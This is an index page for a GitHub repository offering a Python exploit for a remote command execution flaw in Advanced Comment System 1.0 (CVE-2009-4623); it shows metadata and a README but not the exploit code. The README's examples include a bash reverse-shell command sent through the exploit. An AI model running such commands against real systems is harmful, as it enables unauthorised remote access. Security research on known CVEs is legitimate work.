https://github.com/hupe1980/cve-2009-4623
Advanced Comment System 1.0 - Remote Command Execution (RCE)
https://github.com/hupe1980/cve-2009-4623
cve-2009-4623
Last synced: 11 days ago
JSON representation
Advanced Comment System 1.0 - Remote Command Execution (RCE)
- Host: GitHub
- URL: https://github.com/hupe1980/cve-2009-4623
- Owner: hupe1980
- License: mit
- Created: 2022-08-19T09:46:03.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2022-08-19T12:22:29.000Z (about 3 years ago)
- Last Synced: 2025-04-04T16:47:18.207Z (7 months ago)
- Topics: cve-2009-4623
- Language: Python
- Homepage:
- Size: 4.88 KB
- Stars: 0
- Watchers: 2
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Advanced Comment System 1.0 - Remote Command Execution (RCE)
> https://nvd.nist.gov/vuln/detail/CVE-2009-4623## Examples
```bash
python3 exploit.py http://127.0.0.1 uname -a
``````bash
python3 exploit.py http://127.0.0.1 'bash -i >& /dev/tcp/127.0.0.1/443 0>&1'
```